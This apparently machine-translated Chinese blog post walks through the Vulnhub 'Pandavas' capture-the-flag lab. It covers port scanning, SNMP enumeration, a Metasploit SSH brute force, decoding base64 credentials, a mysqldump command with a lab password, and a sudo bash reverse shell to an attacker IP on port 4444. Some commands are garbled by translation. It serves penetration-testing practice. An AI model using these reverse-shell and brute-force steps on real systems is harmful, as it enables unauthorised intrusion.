pandavas vulnhub

最新推荐文章于 2024-06-19 22:37:04 发布
最新推荐文章于 2024-06-19 22:37:04 发布
阅读量1.2k 收藏
点赞数
分类专栏: 打靶 文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51151193/article/details/122777618
版权

HA:Pandavas Vulnhub 演练
2020 年 6 月 16 日通过拉吉钱德尔
今天我们要解决另一个名为“Pandavas”的 boot2root 挑战。它可在 Vulnhub 上用于渗透测试实践。如果我们有正确的基础知识来打破实验室并且注意我们在侦察期间发现的所有细节,那么这个实验室并不难。制作这个实验室的功劳归功于Hacking Articles。让我们开始学习如何成功分解它。

级别:未定义

由于这些实验室可在 Vulnhub 网站上找到。让我们从这里下载实验室文件。

渗透测试方法
侦察

网络发现
地图
枚举

Snmpwalk
迪布
无线网络
使用 Metasploit 进行暴力破解
线性枚举
剥削

SSH登录
码头工人服务
mysql转储
权限提升

滥用 SUDO
夺旗
演练

侦察
与往常一样,我们使用“Netdiscover”工具识别主机的 IP:

所以,让我们首先用 nmap 列出所有 TCP 端口。

nmap -sV -p- 192.168.10.162

然后,我们将进行第二次扫描,但请注意,我们将添加命令“-sU”以获取 UDP 服务。

第二次检查 UDP 服务需要更长的时间,所以当 nmap 完成时,我们将借此机会检查找到的 TCP 服务。

枚举
我们首先访问web服务(80端口),我们找到了几张关于Pandavas的图片和资料,我们查看了源代码和robots.txt,似乎没有什么用处。(或至少,目前)

在 Dirb 的帮助下,我们将使用一个大字典和一个具有更多已知扩展名的短字典,我们将找到一个名为“ hidden.docx ”的文件

我们下载了“ hidden.docx ”文件:

我们打开文档,它为我们提供了“熊猫”历史的更多细节,下面我们看到了一条线索,可以引导我们找到第一面旗帜。

我们复制文本并将其粘贴到 nano 或其他文本编辑器中,标志会魔法出现。

现在,在枚举 UDP 服务时,我们检测到一个 SNMP 服务(端口 161),该服务通常被错误配置为“公共”通道,其中通常显示服务和组织的其他应用程序的机密信息。

为此,我们将使用“snmpwalk”工具,在那里我们将找到第二个标志和机器的用户名。

snmpwalk -v1 -c public 192.168.10.162 | more

剥削
我们已经有一个用户,但我们缺少密码,我尝试了一个包含 1000 个最常用密码的字典,但我们来自“黑客文章”的朋友不会让我们变得容易。所以我不得不使用 Web 服务页面(记住,端口 80)创建一个自定义字典。

创建字典后,我们使用 Metasploit 中的“ SSH LOGIN ”模块,我们使用用户“ karna ”和我们的自定义字典对其进行配置。

完美的!所以现在我们通过 SSH 连接并开始探索机器内部。

进入后,我们可以列出其他两个用户,我们检查我们拥有权限的文件和二进制文件,但这对我们不起作用。

因此,我们使用 Metasploit 蛮力启动另一个凭证列表,指定用户“ krishna ”。

伟大的!我们向用户“ krishna ”进行身份验证:

有了这个用户,我们可以通过 sudo 访问所有内容,因此我们可以以 sudo 的身份运行反向 shell,获得 root 权限,读取 root 标志并结束游戏……但我们距离完成挑战还有两个标志!

我们列出了机器的接口,发现至少在三个服务中存在 docker。

现在我们将列出机器上运行的 docker 进程,我们将列出一个 FTP 服务和一个看起来很有趣的 MySQL。

从 FTP 服务连接开始:

转到“ root ”文件夹,找到一个名为“ .ash_history ”的文件,读取它并获取以 Base64 编码的标志和凭据。

用base64解码字符串并获取密码。

我们现在将连接到 Docker 的 MySQL 服务:

我们将使用凭据“root”和密码“ ignite@123 ”闯入数据库。我们将使用以下命令帮助自己:

mysqldump -A –u root –password =ignite@123 |grep flag

完美,我们已经有了四个标志,现在我们只需要以“ root ”用户身份爬升权限并读取标志。

权限提升
获取 root 的方法有很多,我在 4444 端口上放置了一个带有 netcat 监听的终端,并使用以下命令在我的 kali 中以 root 身份启动了一个反向 shell:

在我们的卡利:

数控-nvlp 4444
在受害者机器上:

sudo -u root bash -i >& /dev/tcp/192.168.10.161/4444 0>&1

现在我们在受害者机器上执行命令,并在我们的 kali 中以 root 身份获得一个 shell。

现在是的,我们阅读了我们心爱的根标志并获得了第五个也是最后一个标志:

f0_f0_f0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Instacart-Analysis-by-Pandavas:合作
04-19
Instacart分析介绍Instacart是一家美国公司,在美国和加拿大经营杂货店送货和接送服务。 通过个人购物者的购物,该服务允许客户从参与零售商处订购杂货。 在COVID-19锁定期间,Instacart成为数百万困在家里的美国人...
靶机渗透测试(Pandavas
@小张小张的博客
11-01 1080
靶机渗透测试(): **Vulnhub靶机 ** 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(Easy) 目标:Get root! 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令:netdiscover -i eth0 -r 192.168.10.0 得到靶机ip为:192.168.10.33 2. nmap进行靶机端口服务扫描 命令:nmap -sS -Pn -A -p-
MahabharatCharacters
06-20
摩诃婆罗多人物这是为 iPhone 平台编写的泰米尔语 (தமிழ்) 应用程序。 它使用一个简单的视图控制器进行导航,以说明出现在... 字符的交叉导航信息无缝流动信息更新人物更新Pandavas 和 Gauravas 的颜色代码分类
工业网关在智能制造中的具体应用和效果-天拓四方
2401_84969963的博客
06-14 687
通过对数据的处理和分析,我们可以获得设备的运行状态、生产效率、故障预警等信息,为企业提供决策支持和优化建议。未来,随着技术的不断进步和应用场景的拓展,工业网关将在智能制造领域发挥更加重要的作用,为企业创造更多的价值。网关设备通过有线或无线方式与生产设备进行连接,实时收集设备的运行状态、生产数据等信息,并将数据通过安全可靠的通信协议传输至企业的数据中心或云平台。通过工业网关的应用,企业实现了对生产设备的实时监控和数据分析,能够及时发现并解决设备故障和生产瓶颈,提高生产效率。
创建Docker容器与外部机通信(端口映射的方式)
m0_52980547的博客
06-14 691
首先,创建一个自定义的Docker网络,这样可以更好地控制容器间的通信以及容器与外部网络的交互。自定义网络允许你为容器分配固定的IP地址。这个命令创建了一个名为mynetwork的网络,使用了172.18.0.0/16作为子网。
什么是蠕虫病毒?
wanhengwangluo的博客
06-13 428
蠕虫病毒是网络安全领域中的一大威胁,蠕虫病毒有着极强的隐蔽性,传播速度十分快,有着极强的破坏力,会给企业正常运转的业务带来巨大的挑战,为了能够有效的应对蠕虫病毒,企业采取了一系列的技术性措施,构建一个多层次、全方位的防护体系来进行抵御蠕虫病毒。蠕虫病毒是一种常见的计算机病毒,会利用网络来进行复制和传播,它的传染途径是主要通过网络和电子邮件,蠕虫病毒和一般的病毒是不同的,它不需要附着在宿主程序当中,一般是通过端口漏洞来进行传播的。
《TCP/IP网络编程》(第十五章)套接字和标准I/O
立志成为炼丹师?
06-14 1122
之前数据通信时,使用的是read&write函数以及其他各种I/O函数,本章将使用,例如C语言的fopen、fgetc、fputs等等;C++语言的cout、cin等等。
网络安全 DVWA通关指南 SQL Injection(SQL注入)
YueXuan_521的博客
06-17 834
Web应用程序对用户输入的数据校验处理不严或者根本没有校验,致使用户可以拼接执行SQL命令。可能导致数据泄露或数据破坏,缺乏可审计性,甚至导致完全接管主机。布尔型盲注:根据返回页面判断条件真假时间型盲注:用页面返回时间是否增加判断是否存在注入基于错误的注入:页面会返回错误信息联合查询注入:可以使用union的情况下堆查询注入:可以同时执行多条语句使用参数化查询。数据库服务器不会把参数的内容当作SQL指令的一部分来拼接执行;而是在数据库完成SQL指令的编译后才套用参数运行(预编译)。
【杂记-浅谈MTU最大传输单元】
叫我小虎就行了的博客
06-14 905
【杂记-浅谈MTU最大传输单元】
【计算机网络体系结构】计算机网络体系结构实验-www实验
最新发布
weixin_52553215的博客
06-19 390
2.浏览器打开。
LWIP移植
嵌入式分享
06-12 720
本文主要对LWIP简单介绍,并对LWIP进行基于UCOS操作系统的移植,以及对LWIP相关编程接口作简单介绍
【杂记-浅谈VRRP虚拟路由冗余协议】
叫我小虎就行了的博客
06-13 1177
【杂记-浅谈VRRP虚拟路由冗余协议】
Http协议JSON格式
weixin_55702682的博客
06-14 973
超文本传输协议(Hyper Text Transfer Protocol,HTTP)规定客户端如何从服务器端获取文档和向服务器端提交表单内容,以及服务器端如何响应这些请求和提交。HTTP是一个基于TCP/IP通信协议来传递数据的协议,传输的数据类型为HTML 文件,、图片文件, 查询结果等。HTTP协议一般用于B/S架构(浏览器和服务器架构模式)。浏览器作为HTTP客户端通过URL向HTTP服务端即WEB服务器发送所有请求。为了解决上述HTTP存在的问题,就用到了HTTPS。
计算机网络第一章-概述②
2302_78218660的博客
06-14 388
在我国最早着手建设专用计算机广域网的是铁道部。1994年4月20日我国用64kbit/s专线正式连入互联网。我国规模最大的5个公用计算机网络:①中国电信互联网CHINANET②中国联通UNINET③中国移动CMNET④中国教育和科研计算机网CERNET⑤中国科学技术网CSTNET。
乐鑫ESP32相关资料整理
hzlarm的博客
06-14 981
乐鑫科技 EspressifAIoT 领域软硬件产品的研发与设计,专注于研发高集成、低功耗、性能卓越、安全稳定、高性价比的无线通信 SoC,现已发布 ESP8266、ESP32、ESP32-S、ESP32-C 和 ESP32-H 系列芯片、模组和开发板。包含涉及各种ESP soc系列的开源项目,包括sdk、组件、库、解决方案和工具。芯片概览模组概览开发板概览,可以通过乐鑫产品选型工具对比选型。
防护DDoS攻击出现的常见误区
m0_70754056的博客
06-12 302
这是一种很常见的错误观点,CDN的作用是缓存加速而不是防御攻击,对DDoS攻击流量并不能识别和清洗的,当遭到DDoS攻击时,CDN节点会迅速崩溃,导致服务器直接宕机。有些运维人员通过设置流量阈值警报认为可以防护DDoS攻击,但其实阈值警报只是通知你正在被攻击,并不能阻止攻击,当你知道这正在被DDoS攻击,如果没有专业的防御措施,还是只能束手无策的等待攻击结束,服务器才能正常访问。很多运维人员会通过自己的一些方式来缓解DDoS攻击,但效果却并不明显,今天蔡蔡就来说说防护DDoS攻击最容易出现哪些误区?
iptables 防火墙
2401_83330816的博客
06-13 734
容纳各种规则链。
计算机网络期末复习1(最后一天才开始学版)
qq_29495615的博客
06-15 971
码分复用最初用于军事通信,因为这种系统发送的信号有很强的抗干扰能力,其频谱类似于白噪声,不易被敌人发现,后来才广泛的使用在民用的移动通信中,它的优越性在于可以提高通信的话音质量和数据传输的可靠性,减少干扰对通信的影响,增大通信系统的容量,,降低手机的平均发射功率等。频分复用(FDM):按频率划分的不同信道,用户分到一定的频带后,在通信过程中自始至终都占用这个频带,可见频分复用的所有用户在同样的时间占用不同的带宽资源(带宽指频率带)7D 5D:表示一个真正的7D(因为5D是7D的转义形式)。
安装MySQL5.7到CentOS7(无网络)
sun_xo的博客
06-16 287
安装MySQL5.7到CentOS7(无网络)
msf原生shellcode迁移进程后如何获取攻击者ip
qq_54030686的博客
06-13 365
已知攻击者ip 查找shellcode

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0_f0_f0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值